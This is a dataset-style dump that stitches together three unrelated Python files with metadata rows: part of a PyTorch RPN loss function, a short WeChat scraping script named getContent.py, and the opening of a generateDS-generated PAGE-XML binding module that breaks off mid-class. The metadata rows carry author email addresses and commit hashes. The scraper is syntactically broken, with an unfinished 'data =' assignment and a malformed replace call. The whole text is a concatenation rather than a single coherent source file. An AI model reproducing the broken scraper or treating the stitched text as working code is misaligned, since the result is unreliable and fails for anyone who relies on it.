                    # Add op that generates training labels for in-network RPN proposals
                    blobs_out = self.RPN_GenerateProposalLabels(rpn_rois, roidb, im_info)
                    return_dict.update(blobs_out)
                else:
                    # Alias rois to rpn_rois for inference
                    return_dict['rois'] = return_dict['rpn_rois']
        return return_dict
def single_scale_rpn_losses(
        rpn_cls_logits, rpn_bbox_pred,
        rpn_labels_int32_wide, rpn_bbox_targets_wide,
        rpn_bbox_inside_weights_wide, rpn_bbox_outside_weights_wide):
    """Add losses for a single scale RPN model (i.e., no FPN).

    The *_wide blobs cover the padded image; they are cropped to the
    spatial size of the network outputs before computing the losses.
    Returns (loss_rpn_cls, loss_rpn_bbox).
    """
    h, w = rpn_cls_logits.shape[2:]
    rpn_labels_int32 = rpn_labels_int32_wide[:, :, :h, :w]  # -1 means ignore
    h, w = rpn_bbox_pred.shape[2:]
    rpn_bbox_targets = rpn_bbox_targets_wide[:, :, :h, :w]
    rpn_bbox_inside_weights = rpn_bbox_inside_weights_wide[:, :, :h, :w]
    rpn_bbox_outside_weights = rpn_bbox_outside_weights_wide[:, :, :h, :w]
    if cfg.RPN.CLS_ACTIVATION == 'softmax':
        # Reshape logits to (N, 2) so cross_entropy sees a 2-class problem.
        B, C, H, W = rpn_cls_logits.size()
        rpn_cls_logits = rpn_cls_logits.view(
            B, 2, C // 2, H, W).permute(0, 2, 3, 4, 1).contiguous().view(-1, 2)
        rpn_labels_int32 = rpn_labels_int32.contiguous().view(-1).long()
        # the loss is averaged over non-ignored targets
        loss_rpn_cls = F.cross_entropy(
            rpn_cls_logits, rpn_labels_int32, ignore_index=-1)
    else:
        # Sigmoid mode: mask out ignored anchors (label -1) via the weight,
        # then average manually over the non-ignored ones.
        # NOTE(review): size_average= is deprecated in modern PyTorch;
        # reduction='sum' is the equivalent -- confirm the target version.
        weight = (rpn_labels_int32 >= 0).float()
        loss_rpn_cls = F.binary_cross_entropy_with_logits(
            rpn_cls_logits, rpn_labels_int32.float(), weight, size_average=False)
        loss_rpn_cls /= weight.sum()
    loss_rpn_bbox = net_utils.smooth_l1_loss(
        rpn_bbox_pred, rpn_bbox_targets, rpn_bbox_inside_weights, rpn_bbox_outside_weights,
        beta=1/9)
    return loss_rpn_cls, loss_rpn_bbox
|
[
"qqlu1992@gmail.com"
] |
qqlu1992@gmail.com
|
593300d8d86a3b96ee66b4f708950e7b2bf3ea0e
|
7e8752279e9b3c81ead83e6d5c5b57b65372db19
|
/getContent.py
|
cc9e336cd50683b8c8db0bde7ecef74bcd0744ae
|
[] |
no_license
|
kavenshi/spiders
|
4ef8a7d28775de213e9fe6f7be2d75e3a1b2aa00
|
a136a28018782661dda7ae0eed963a54a2e0cf7b
|
refs/heads/master
| 2021-09-06T10:03:49.414997
| 2018-02-04T11:34:41
| 2018-02-04T11:34:41
| 91,144,755
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 505
|
py
|
import re
def getcontent(listurl):
i=0
for i in range(0,len(listurl)):
for j in range(0,len(listurl[i])):
try:
url=listurl[i][j]
url=url.replace("amp;""")
#open the url
data =
titlepat = "<title>(.*?)</title>"
contentpat='id="js_content">(.*?)id="js_sg_bar"'
title = re.compile(titlepat).findall(data)
content=re.compile(contentpat).findall(data)
|
[
"shilinpeng1990@aliyun.com"
] |
shilinpeng1990@aliyun.com
|
ea9f146b1a66b0c18378d7f48eac3479b00d44ed
|
1121885b9f3dc2157e18f0445b83f2b85a3aed45
|
/page_xml_draw/gends/page.py
|
bf800b3de7a9967e86ba000f9e513157cd23a610
|
[
"Apache-2.0"
] |
permissive
|
VRI-UFPR/page-xml-draw
|
b3ae1033a31ee75da3199fd4a47c8d6ccb70eb84
|
ecf3123b385c58286649ba5b5bddc2a9d834daf8
|
refs/heads/master
| 2023-07-20T12:59:57.402407
| 2021-05-01T18:06:14
| 2021-05-01T18:06:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 712,183
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated Thu Apr 22 13:32:04 2021 by generateDS.py version 2.38.6.
# Python 3.7.10 (default, Feb 26 2021, 18:47:35) [GCC 7.3.0]
#
# Command line options:
# ('-o', 'page_xml_draw/gends/page.py')
# ('--user-methods', 'page_xml_draw/gends/user_methods.py')
#
# Command line arguments:
# assets/schema/pagecontent.xsd
#
# Command line:
# /home/sulzbals/anaconda3/envs/page-xml/bin/generateDS -o "page_xml_draw/gends/page.py" --user-methods="page_xml_draw/gends/user_methods.py" assets/schema/pagecontent.xsd
#
# Current working directory (os.getcwd()):
# page_xml_draw
#
import sys
try:
ModulenotfoundExp_ = ModuleNotFoundError
except NameError:
ModulenotfoundExp_ = ImportError
from six.moves import zip_longest
import os
import re as re_
import base64
import datetime as datetime_
import decimal as decimal_
try:
from lxml import etree as etree_
except ModulenotfoundExp_ :
from xml.etree import ElementTree as etree_
Validate_simpletypes_ = True
SaveElementTreeNode = True
if sys.version_info.major == 2:
BaseStrType_ = basestring
else:
BaseStrType_ = str
def parsexml_(infile, parser=None, **kwargs):
    """Parse *infile* (path or file object) and return the document tree.

    Prefers lxml's comment-ignoring compatible parser when etree_ is lxml;
    plain xml.etree lacks ETCompatXMLParser, so its default parser is used.
    """
    if parser is None:
        # Use the lxml ElementTree compatible parser so that, e.g.,
        # we ignore comments.
        try:
            parser = etree_.ETCompatXMLParser()
        except AttributeError:
            # fallback to xml.etree
            parser = etree_.XMLParser()
    try:
        # Normalize os.PathLike arguments to a plain path string.
        if isinstance(infile, os.PathLike):
            infile = os.path.join(infile)
    except AttributeError:
        pass
    return etree_.parse(infile, parser=parser, **kwargs)
def parsexmlstring_(instring, parser=None, **kwargs):
    """Parse an XML document from a string and return its root element."""
    if parser is None:
        # Use the lxml ElementTree compatible parser so that, e.g.,
        # we ignore comments.
        try:
            parser = etree_.ETCompatXMLParser()
        except AttributeError:
            # fallback to xml.etree
            parser = etree_.XMLParser()
    return etree_.fromstring(instring, parser=parser, **kwargs)
#
# Namespace prefix definition table (and other attributes, too)
#
# The module generatedsnamespaces, if it is importable, must contain
# a dictionary named GeneratedsNamespaceDefs. This Python dictionary
# should map element type names (strings) to XML schema namespace prefix
# definitions. The export method for any class for which there is
# a namespace prefix definition, will export that definition in the
# XML representation of that element. See the export method of
# any generated element type class for an example of the use of this
# table.
# A sample table is:
#
# # File: generatedsnamespaces.py
#
# GenerateDSNamespaceDefs = {
# "ElementtypeA": "http://www.xxx.com/namespaceA",
# "ElementtypeB": "http://www.xxx.com/namespaceB",
# }
#
# Additionally, the generatedsnamespaces module can contain a python
# dictionary named GenerateDSNamespaceTypePrefixes that associates element
# types with the namespace prefixes that are to be added to the
# "xsi:type" attribute value. See the exportAttributes method of
# any generated element type and the generation of "xsi:type" for an
# example of the use of this table.
# An example table:
#
# # File: generatedsnamespaces.py
#
# GenerateDSNamespaceTypePrefixes = {
# "ElementtypeC": "aaa:",
# "ElementtypeD": "bbb:",
# }
#
try:
from generatedsnamespaces import GenerateDSNamespaceDefs as GenerateDSNamespaceDefs_
except ModulenotfoundExp_ :
GenerateDSNamespaceDefs_ = {}
try:
from generatedsnamespaces import GenerateDSNamespaceTypePrefixes as GenerateDSNamespaceTypePrefixes_
except ModulenotfoundExp_ :
GenerateDSNamespaceTypePrefixes_ = {}
#
# You can replace the following class definition by defining an
# importable module named "generatedscollector" containing a class
# named "GdsCollector". See the default class definition below for
# clues about the possible content of that class.
#
try:
    from generatedscollector import GdsCollector as GdsCollector_
except ModulenotfoundExp_ :
    # Fallback: a minimal collector that accumulates warning messages
    # produced while parsing/validating, used when no user-supplied
    # "generatedscollector" module is importable.
    class GdsCollector_(object):
        def __init__(self, messages=None):
            # Share the caller's list when one is given; otherwise start fresh.
            if messages is None:
                self.messages = []
            else:
                self.messages = messages
        def add_message(self, msg):
            self.messages.append(msg)
        def get_messages(self):
            return self.messages
        def clear_messages(self):
            self.messages = []
        def print_messages(self):
            # Emit each collected message to stdout, prefixed "Warning:".
            for msg in self.messages:
                print("Warning: {}".format(msg))
        def write_messages(self, outstream):
            # Same as print_messages but to an arbitrary writable stream.
            for msg in self.messages:
                outstream.write("Warning: {}\n".format(msg))
#
# The super-class for enum types
#
try:
from enum import Enum
except ModulenotfoundExp_ :
Enum = object
#
# The root super-class for element type classes
#
# Calls to the methods in these classes are generated by generateDS.py.
# You can replace these methods by re-implementing the following class
# in a module named generatedssuper.py.
try:
from generatedssuper import GeneratedsSuper
except ModulenotfoundExp_ as exp:
    class GeneratedsSuper(object):
        """Fallback base class for all generated element classes.

        Provides the ``gds_*`` helpers the generated bindings rely on:
        formatting, parsing and validation of XSD simple types (string,
        base64, integer, float, decimal, double, boolean, date/time and
        their space-separated list forms), cardinality checks, and small
        utilities for working with lxml nodes.  Used only when a
        project-supplied ``generatedssuper`` module is not importable.
        """
        __hash__ = object.__hash__
        # Matches a trailing +hh:mm/-hh:mm timezone offset (max +/-14:00).
        tzoff_pattern = re_.compile(r'(\+|-)((0\d|1[0-3]):[0-5]\d|14:00)$')
        class _FixedOffsetTZ(datetime_.tzinfo):
            """Minimal fixed-offset tzinfo used when parsing zoned values."""
            def __init__(self, offset, name):
                self.__offset = datetime_.timedelta(minutes=offset)
                self.__name = name
            def utcoffset(self, dt):
                return self.__offset
            def tzname(self, dt):
                return self.__name
            def dst(self, dt):
                return None
        def gds_format_string(self, input_data, input_name=''):
            return input_data
        def gds_parse_string(self, input_data, node=None, input_name=''):
            return input_data
        def gds_validate_string(self, input_data, node=None, input_name=''):
            if not input_data:
                return ''
            else:
                return input_data
        def gds_format_base64(self, input_data, input_name=''):
            return base64.b64encode(input_data)
        def gds_validate_base64(self, input_data, node=None, input_name=''):
            return input_data
        def gds_format_integer(self, input_data, input_name=''):
            return '%d' % input_data
        def gds_parse_integer(self, input_data, node=None, input_name=''):
            try:
                ival = int(input_data)
            except (TypeError, ValueError) as exp:
                raise_parse_error(node, 'Requires integer value: %s' % exp)
            return ival
        def gds_validate_integer(self, input_data, node=None, input_name=''):
            try:
                value = int(input_data)
            except (TypeError, ValueError):
                raise_parse_error(node, 'Requires integer value')
            return value
        def gds_format_integer_list(self, input_data, input_name=''):
            if len(input_data) > 0 and not isinstance(input_data[0], BaseStrType_):
                input_data = [str(s) for s in input_data]
            return '%s' % ' '.join(input_data)
        def gds_validate_integer_list(
                self, input_data, node=None, input_name=''):
            values = input_data.split()
            for value in values:
                try:
                    int(value)
                except (TypeError, ValueError):
                    raise_parse_error(node, 'Requires sequence of integer values')
            return values
        def gds_format_float(self, input_data, input_name=''):
            # NOTE(review): rstrip('0') can leave a trailing '.' (e.g. '1.');
            # kept as-is for compatibility with generated callers.
            return ('%.15f' % input_data).rstrip('0')
        def gds_parse_float(self, input_data, node=None, input_name=''):
            try:
                fval_ = float(input_data)
            except (TypeError, ValueError) as exp:
                raise_parse_error(node, 'Requires float or double value: %s' % exp)
            return fval_
        def gds_validate_float(self, input_data, node=None, input_name=''):
            try:
                value = float(input_data)
            except (TypeError, ValueError):
                raise_parse_error(node, 'Requires float value')
            return value
        def gds_format_float_list(self, input_data, input_name=''):
            if len(input_data) > 0 and not isinstance(input_data[0], BaseStrType_):
                input_data = [str(s) for s in input_data]
            return '%s' % ' '.join(input_data)
        def gds_validate_float_list(
                self, input_data, node=None, input_name=''):
            values = input_data.split()
            for value in values:
                try:
                    float(value)
                except (TypeError, ValueError):
                    raise_parse_error(node, 'Requires sequence of float values')
            return values
        def gds_format_decimal(self, input_data, input_name=''):
            # Trim insignificant trailing zeros (and a then-dangling dot).
            return_value = '%s' % input_data
            if '.' in return_value:
                return_value = return_value.rstrip('0')
                if return_value.endswith('.'):
                    return_value = return_value.rstrip('.')
            return return_value
        def gds_parse_decimal(self, input_data, node=None, input_name=''):
            try:
                decimal_value = decimal_.Decimal(input_data)
            except (TypeError, ValueError):
                raise_parse_error(node, 'Requires decimal value')
            return decimal_value
        def gds_validate_decimal(self, input_data, node=None, input_name=''):
            try:
                value = decimal_.Decimal(input_data)
            except (TypeError, ValueError):
                raise_parse_error(node, 'Requires decimal value')
            return value
        def gds_format_decimal_list(self, input_data, input_name=''):
            if len(input_data) > 0 and not isinstance(input_data[0], BaseStrType_):
                input_data = [str(s) for s in input_data]
            return ' '.join([self.gds_format_decimal(item) for item in input_data])
        def gds_validate_decimal_list(
                self, input_data, node=None, input_name=''):
            values = input_data.split()
            for value in values:
                try:
                    decimal_.Decimal(value)
                except (TypeError, ValueError):
                    raise_parse_error(node, 'Requires sequence of decimal values')
            return values
        def gds_format_double(self, input_data, input_name=''):
            return '%s' % input_data
        def gds_parse_double(self, input_data, node=None, input_name=''):
            try:
                fval_ = float(input_data)
            except (TypeError, ValueError) as exp:
                raise_parse_error(node, 'Requires double or float value: %s' % exp)
            return fval_
        def gds_validate_double(self, input_data, node=None, input_name=''):
            try:
                value = float(input_data)
            except (TypeError, ValueError):
                raise_parse_error(node, 'Requires double or float value')
            return value
        def gds_format_double_list(self, input_data, input_name=''):
            if len(input_data) > 0 and not isinstance(input_data[0], BaseStrType_):
                input_data = [str(s) for s in input_data]
            return '%s' % ' '.join(input_data)
        def gds_validate_double_list(
                self, input_data, node=None, input_name=''):
            values = input_data.split()
            for value in values:
                try:
                    float(value)
                except (TypeError, ValueError):
                    raise_parse_error(
                        node, 'Requires sequence of double or float values')
            return values
        def gds_format_boolean(self, input_data, input_name=''):
            return ('%s' % input_data).lower()
        def gds_parse_boolean(self, input_data, node=None, input_name=''):
            # XSD boolean lexical forms: 'true'/'1' and 'false'/'0'.
            if input_data in ('true', '1'):
                bval = True
            elif input_data in ('false', '0'):
                bval = False
            else:
                raise_parse_error(node, 'Requires boolean value')
            return bval
        def gds_validate_boolean(self, input_data, node=None, input_name=''):
            if input_data not in (True, 1, False, 0, ):
                raise_parse_error(
                    node,
                    'Requires boolean value '
                    '(one of True, 1, False, 0)')
            return input_data
        def gds_format_boolean_list(self, input_data, input_name=''):
            if len(input_data) > 0 and not isinstance(input_data[0], BaseStrType_):
                input_data = [str(s) for s in input_data]
            return '%s' % ' '.join(input_data)
        def gds_validate_boolean_list(
                self, input_data, node=None, input_name=''):
            values = input_data.split()
            for value in values:
                value = self.gds_parse_boolean(value, node, input_name)
                if value not in (True, 1, False, 0, ):
                    raise_parse_error(
                        node,
                        'Requires sequence of boolean values '
                        '(one of True, 1, False, 0)')
            return values
        def gds_validate_datetime(self, input_data, node=None, input_name=''):
            return input_data
        def gds_format_datetime(self, input_data, input_name=''):
            # Render an XSD dateTime; fractional seconds only when non-zero,
            # then an optional UTC offset ('Z' when the offset is zero).
            if input_data.microsecond == 0:
                _svalue = '%04d-%02d-%02dT%02d:%02d:%02d' % (
                    input_data.year,
                    input_data.month,
                    input_data.day,
                    input_data.hour,
                    input_data.minute,
                    input_data.second,
                )
            else:
                _svalue = '%04d-%02d-%02dT%02d:%02d:%02d.%s' % (
                    input_data.year,
                    input_data.month,
                    input_data.day,
                    input_data.hour,
                    input_data.minute,
                    input_data.second,
                    ('%f' % (float(input_data.microsecond) / 1000000))[2:],
                )
            if input_data.tzinfo is not None:
                tzoff = input_data.tzinfo.utcoffset(input_data)
                if tzoff is not None:
                    total_seconds = tzoff.seconds + (86400 * tzoff.days)
                    if total_seconds == 0:
                        _svalue += 'Z'
                    else:
                        if total_seconds < 0:
                            _svalue += '-'
                            total_seconds *= -1
                        else:
                            _svalue += '+'
                        hours = total_seconds // 3600
                        minutes = (total_seconds - (hours * 3600)) // 60
                        _svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
            return _svalue
        @classmethod
        def gds_parse_datetime(cls, input_data):
            # Split off a trailing 'Z' or +hh:mm/-hh:mm offset before strptime.
            tz = None
            if input_data[-1] == 'Z':
                tz = GeneratedsSuper._FixedOffsetTZ(0, 'UTC')
                input_data = input_data[:-1]
            else:
                results = GeneratedsSuper.tzoff_pattern.search(input_data)
                if results is not None:
                    tzoff_parts = results.group(2).split(':')
                    tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
                    if results.group(1) == '-':
                        tzoff *= -1
                    tz = GeneratedsSuper._FixedOffsetTZ(
                        tzoff, results.group(0))
                    input_data = input_data[:-6]
            time_parts = input_data.split('.')
            if len(time_parts) > 1:
                # Normalize fractional seconds to exactly six digits.
                micro_seconds = int(float('0.' + time_parts[1]) * 1000000)
                input_data = '%s.%s' % (
                    time_parts[0], "{}".format(micro_seconds).rjust(6, "0"), )
                dt = datetime_.datetime.strptime(
                    input_data, '%Y-%m-%dT%H:%M:%S.%f')
            else:
                dt = datetime_.datetime.strptime(
                    input_data, '%Y-%m-%dT%H:%M:%S')
            dt = dt.replace(tzinfo=tz)
            return dt
        def gds_validate_date(self, input_data, node=None, input_name=''):
            return input_data
        def gds_format_date(self, input_data, input_name=''):
            _svalue = '%04d-%02d-%02d' % (
                input_data.year,
                input_data.month,
                input_data.day,
            )
            try:
                if input_data.tzinfo is not None:
                    tzoff = input_data.tzinfo.utcoffset(input_data)
                    if tzoff is not None:
                        total_seconds = tzoff.seconds + (86400 * tzoff.days)
                        if total_seconds == 0:
                            _svalue += 'Z'
                        else:
                            if total_seconds < 0:
                                _svalue += '-'
                                total_seconds *= -1
                            else:
                                _svalue += '+'
                            hours = total_seconds // 3600
                            minutes = (total_seconds - (hours * 3600)) // 60
                            _svalue += '{0:02d}:{1:02d}'.format(
                                hours, minutes)
            except AttributeError:
                # Plain datetime.date has no tzinfo; emit the date only.
                pass
            return _svalue
        @classmethod
        def gds_parse_date(cls, input_data):
            tz = None
            if input_data[-1] == 'Z':
                tz = GeneratedsSuper._FixedOffsetTZ(0, 'UTC')
                input_data = input_data[:-1]
            else:
                results = GeneratedsSuper.tzoff_pattern.search(input_data)
                if results is not None:
                    tzoff_parts = results.group(2).split(':')
                    tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
                    if results.group(1) == '-':
                        tzoff *= -1
                    tz = GeneratedsSuper._FixedOffsetTZ(
                        tzoff, results.group(0))
                    input_data = input_data[:-6]
            dt = datetime_.datetime.strptime(input_data, '%Y-%m-%d')
            dt = dt.replace(tzinfo=tz)
            return dt.date()
        def gds_validate_time(self, input_data, node=None, input_name=''):
            return input_data
        def gds_format_time(self, input_data, input_name=''):
            if input_data.microsecond == 0:
                _svalue = '%02d:%02d:%02d' % (
                    input_data.hour,
                    input_data.minute,
                    input_data.second,
                )
            else:
                _svalue = '%02d:%02d:%02d.%s' % (
                    input_data.hour,
                    input_data.minute,
                    input_data.second,
                    ('%f' % (float(input_data.microsecond) / 1000000))[2:],
                )
            if input_data.tzinfo is not None:
                tzoff = input_data.tzinfo.utcoffset(input_data)
                if tzoff is not None:
                    total_seconds = tzoff.seconds + (86400 * tzoff.days)
                    if total_seconds == 0:
                        _svalue += 'Z'
                    else:
                        if total_seconds < 0:
                            _svalue += '-'
                            total_seconds *= -1
                        else:
                            _svalue += '+'
                        hours = total_seconds // 3600
                        minutes = (total_seconds - (hours * 3600)) // 60
                        _svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
            return _svalue
        def gds_validate_simple_patterns(self, patterns, target):
            # pat is a list of lists of strings/patterns.
            # The target value must match at least one of the patterns
            # in order for the test to succeed.
            found1 = True
            for patterns1 in patterns:
                found2 = False
                for patterns2 in patterns1:
                    mo = re_.search(patterns2, target)
                    if mo is not None and len(mo.group(0)) == len(target):
                        found2 = True
                        break
                if not found2:
                    found1 = False
                    break
            return found1
        @classmethod
        def gds_parse_time(cls, input_data):
            tz = None
            if input_data[-1] == 'Z':
                tz = GeneratedsSuper._FixedOffsetTZ(0, 'UTC')
                input_data = input_data[:-1]
            else:
                results = GeneratedsSuper.tzoff_pattern.search(input_data)
                if results is not None:
                    tzoff_parts = results.group(2).split(':')
                    tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
                    if results.group(1) == '-':
                        tzoff *= -1
                    tz = GeneratedsSuper._FixedOffsetTZ(
                        tzoff, results.group(0))
                    input_data = input_data[:-6]
            if len(input_data.split('.')) > 1:
                dt = datetime_.datetime.strptime(input_data, '%H:%M:%S.%f')
            else:
                dt = datetime_.datetime.strptime(input_data, '%H:%M:%S')
            dt = dt.replace(tzinfo=tz)
            return dt.time()
        def gds_check_cardinality_(
                self, value, input_name,
                min_occurs=0, max_occurs=1, required=None):
            # Record (not raise) a warning when the number of supplied
            # values violates the schema's occurrence constraints.
            if value is None:
                length = 0
            elif isinstance(value, list):
                length = len(value)
            else:
                length = 1
            if required is not None :
                if required and length < 1:
                    self.gds_collector_.add_message(
                        "Required value {}{} is missing".format(
                            input_name, self.gds_get_node_lineno_()))
            if length < min_occurs:
                self.gds_collector_.add_message(
                    "Number of values for {}{} is below "
                    "the minimum allowed, "
                    "expected at least {}, found {}".format(
                        input_name, self.gds_get_node_lineno_(),
                        min_occurs, length))
            elif length > max_occurs:
                self.gds_collector_.add_message(
                    "Number of values for {}{} is above "
                    "the maximum allowed, "
                    "expected at most {}, found {}".format(
                        input_name, self.gds_get_node_lineno_(),
                        max_occurs, length))
        def gds_validate_builtin_ST_(
                self, validator, value, input_name,
                min_occurs=None, max_occurs=None, required=None):
            if value is not None:
                try:
                    validator(value, input_name=input_name)
                except GDSParseError as parse_error:
                    self.gds_collector_.add_message(str(parse_error))
        def gds_validate_defined_ST_(
                self, validator, value, input_name,
                min_occurs=None, max_occurs=None, required=None):
            if value is not None:
                try:
                    validator(value)
                except GDSParseError as parse_error:
                    self.gds_collector_.add_message(str(parse_error))
        def gds_str_lower(self, instring):
            return instring.lower()
        def get_path_(self, node):
            # Build an XPath-like '/'-separated path from root to node.
            path_list = []
            self.get_path_list_(node, path_list)
            path_list.reverse()
            path = '/'.join(path_list)
            return path
        Tag_strip_pattern_ = re_.compile(r'\{.*\}')
        def get_path_list_(self, node, path_list):
            if node is None:
                return
            tag = GeneratedsSuper.Tag_strip_pattern_.sub('', node.tag)
            if tag:
                path_list.append(tag)
            self.get_path_list_(node.getparent(), path_list)
        def get_class_obj_(self, node, default_class=None):
            # Honor an xsi:type attribute by resolving the named class
            # from this module's globals; fall back to default_class.
            class_obj1 = default_class
            if 'xsi' in node.nsmap:
                classname = node.get('{%s}type' % node.nsmap['xsi'])
                if classname is not None:
                    names = classname.split(':')
                    if len(names) == 2:
                        classname = names[1]
                    class_obj2 = globals().get(classname)
                    if class_obj2 is not None:
                        class_obj1 = class_obj2
            return class_obj1
        def gds_build_any(self, node, type_name=None):
            # provide default value in case option --disable-xml is used.
            content = ""
            content = etree_.tostring(node, encoding="unicode")
            return content
        @classmethod
        def gds_reverse_node_mapping(cls, mapping):
            return dict(((v, k) for k, v in mapping.items()))
        @staticmethod
        def gds_encode(instring):
            # Python 2 needs explicit encoding; Python 3 strings pass through.
            if sys.version_info.major == 2:
                if ExternalEncoding:
                    encoding = ExternalEncoding
                else:
                    encoding = 'utf-8'
                return instring.encode(encoding)
            else:
                return instring
        @staticmethod
        def convert_unicode(instring):
            if isinstance(instring, str):
                result = quote_xml(instring)
            elif sys.version_info.major == 2 and isinstance(instring, unicode):
                result = quote_xml(instring).encode('utf8')
            else:
                result = GeneratedsSuper.gds_encode(str(instring))
            return result
        def __eq__(self, other):
            # Compare instance dicts, ignoring bookkeeping attributes.
            def excl_select_objs_(obj):
                return (obj[0] != 'parent_object_' and
                        obj[0] != 'gds_collector_')
            if type(self) != type(other):
                return False
            return all(x == y for x, y in zip_longest(
                filter(excl_select_objs_, self.__dict__.items()),
                filter(excl_select_objs_, other.__dict__.items())))
        def __ne__(self, other):
            return not self.__eq__(other)
        # Django ETL transform hooks.
        def gds_djo_etl_transform(self):
            pass
        def gds_djo_etl_transform_db_obj(self, dbobj):
            pass
        # SQLAlchemy ETL transform hooks.
        def gds_sqa_etl_transform(self):
            return 0, None
        def gds_sqa_etl_transform_db_obj(self, dbobj):
            pass
        def gds_get_node_lineno_(self):
            # Source line info is available only when parsed from lxml.
            if (hasattr(self, "gds_elementtree_node_") and
                    self.gds_elementtree_node_ is not None):
                return ' near line {}'.format(
                    self.gds_elementtree_node_.sourceline)
            else:
                return ""
def getSubclassFromModule_(module, class_):
    '''Get the subclass of a class from a specific module.

    The subclass is looked up by naming convention: the original class
    name with a "Sub" suffix.  Returns None when the module does not
    define it.
    '''
    subclass_name = class_.__name__ + 'Sub'
    return getattr(module, subclass_name, None)
#
# If you have installed IPython you can uncomment and use the following.
# IPython is available from http://ipython.scipy.org/.
#
## from IPython.Shell import IPShellEmbed
## args = ''
## ipshell = IPShellEmbed(args,
## banner = 'Dropping into IPython',
## exit_msg = 'Leaving Interpreter, back to program.')
# Then use the following line where and when you want to drop into the
# IPython shell:
# ipshell('<some message> -- Entering ipshell.\nHit Ctrl-D to exit')
#
# Globals
#
# Encoding used by gds_encode() under Python 2 (empty means utf-8).
ExternalEncoding = ''
# Set this to false in order to deactivate during export, the use of
# name space prefixes captured from the input document.
UseCapturedNS_ = True
CapturedNsmap_ = {}
# Splits an lxml tag into its optional '{namespace}' part and local name.
Tag_pattern_ = re_.compile(r'({.*})?(.*)')
String_cleanup_pat_ = re_.compile(r"[\n\r\s]+")
Namespace_extract_pat_ = re_.compile(r'{(.*)}(.*)')
# Matches whole CDATA sections so quote_xml() can leave them unescaped.
CDATA_pattern_ = re_.compile(r"<!\[CDATA\[.*?\]\]>", re_.DOTALL)
# Change this to redirect the generated superclass module to use a
# specific subclass module.
CurrentSubclassModule_ = None
#
# Support/utility functions.
#
def showIndent(outfile, level, pretty_print=True):
    """Write *level* levels of four-space indentation to *outfile*.

    Does nothing when pretty_print is false.
    """
    if pretty_print:
        outfile.write('    ' * level)
def quote_xml(inStr):
    """Escape XML markup characters in *inStr*, leaving CDATA sections
    untouched.  Non-string input is converted with '%s' formatting."""
    if not inStr:
        return ''
    text = inStr if isinstance(inStr, BaseStrType_) else '%s' % inStr
    pieces = []
    cursor = 0
    for match in CDATA_pattern_.finditer(text):
        # Escape the stretch before the CDATA section, then append the
        # section itself verbatim.
        pieces.append(quote_xml_aux(text[cursor:match.start()]))
        pieces.append(text[match.start():match.end()])
        cursor = match.end()
    pieces.append(quote_xml_aux(text[cursor:]))
    return ''.join(pieces)
def quote_xml_aux(inStr):
    """Escape the XML special characters '&', '<' and '>' in *inStr*.

    Bug fix: the replacement strings had been corrupted by HTML-entity
    decoding (each character was "replaced" by itself, a no-op), so no
    escaping occurred.  '&' must be replaced first so the entities
    introduced for '<' and '>' are not themselves re-escaped.
    """
    s1 = inStr.replace('&', '&amp;')
    s1 = s1.replace('<', '&lt;')
    s1 = s1.replace('>', '&gt;')
    return s1
def quote_attrib(inStr):
    """Escape *inStr* for use as an XML attribute value and wrap it in
    quotes.

    Ampersands and angle brackets become character entities.  The value
    is wrapped in double quotes; if it contains double quotes, single
    quotes are used instead, and when both quote styles occur the
    double quotes are escaped as &quot;.

    Bug fix: the entity replacement strings had been corrupted by
    HTML-entity decoding -- the replaces were no-ops and the &quot;
    literal had collapsed into three raw quote characters, which made
    the original line a syntax error.
    """
    s1 = (isinstance(inStr, BaseStrType_) and inStr or '%s' % inStr)
    s1 = s1.replace('&', '&amp;')
    s1 = s1.replace('<', '&lt;')
    s1 = s1.replace('>', '&gt;')
    if '"' in s1:
        if "'" in s1:
            s1 = '"%s"' % s1.replace('"', "&quot;")
        else:
            s1 = "'%s'" % s1
    else:
        s1 = '"%s"' % s1
    return s1
def quote_python(inStr):
    """Return *inStr* rendered as a Python string literal, choosing the
    quote style and single- vs triple-quoting based on which quote
    characters and newlines the value contains."""
    text = inStr
    if text.find("'") == -1:
        # No single quotes: use a single-quoted literal, tripled when
        # the value spans multiple lines.
        if text.find('\n') == -1:
            return "'%s'" % text
        return "'''%s'''" % text
    # Contains single quotes: fall back to a double-quoted literal,
    # escaping any embedded double quotes.
    if text.find('"') != -1:
        text = text.replace('"', '\\"')
    if text.find('\n') == -1:
        return '"%s"' % text
    return '"""%s"""' % text
def get_all_text_(node):
    """Collect the text content of *node*: its own leading text plus
    the tail text following each direct child."""
    parts = [node.text if node.text is not None else '']
    parts.extend(child.tail for child in node if child.tail is not None)
    return ''.join(parts)
def find_attr_value_(attr_name, node):
    """Look up attribute *attr_name* on *node*.

    A plain name is looked up directly.  A 'prefix:name' form is
    resolved through the node's namespace map ('xml' maps to the
    standard XML namespace).  Returns None when the attribute, the
    prefix, or a sensible split is missing.
    """
    attrs = node.attrib
    parts = attr_name.split(':')
    if len(parts) == 1:
        return attrs.get(attr_name)
    if len(parts) == 2:
        prefix, name = parts
        if prefix == 'xml':
            namespace = 'http://www.w3.org/XML/1998/namespace'
        else:
            namespace = node.nsmap.get(prefix)
        if namespace is not None:
            return attrs.get('{%s}%s' % (namespace, name, ))
        return None
    # More than one colon: no lookup is attempted.
    return None
def encode_str_2_3(instr):
    """Return *instr* unchanged (Python 2/3 encoding shim kept for
    API compatibility with other generateDS runtime variants)."""
    return instr
class GDSParseError(Exception):
    """Raised when parsed XML content cannot be converted to the
    expected Python type (see raise_parse_error and the gds_parse_*
    helpers)."""
    pass
def raise_parse_error(node, msg):
    """Raise GDSParseError with *msg*, annotated with the element tag
    and source line when *node* is available."""
    if node is None:
        raise GDSParseError(msg)
    raise GDSParseError(
        '%s (element %s/line %d)' % (msg, node.tag, node.sourceline, ))
class MixedContainer:
    """Container for one piece of mixed XML content.

    Each instance holds either raw text, a simple typed value, or a
    nested complex object, tagged with *category* and *content_type*
    codes (the class constants below) so it can be exported back to
    XML text or to an lxml element tree.
    """
    # Constants for category:
    CategoryNone = 0
    CategoryText = 1
    CategorySimple = 2
    CategoryComplex = 3
    # Constants for content_type:
    TypeNone = 0
    TypeText = 1
    TypeString = 2
    TypeInteger = 3
    TypeFloat = 4
    TypeDecimal = 5
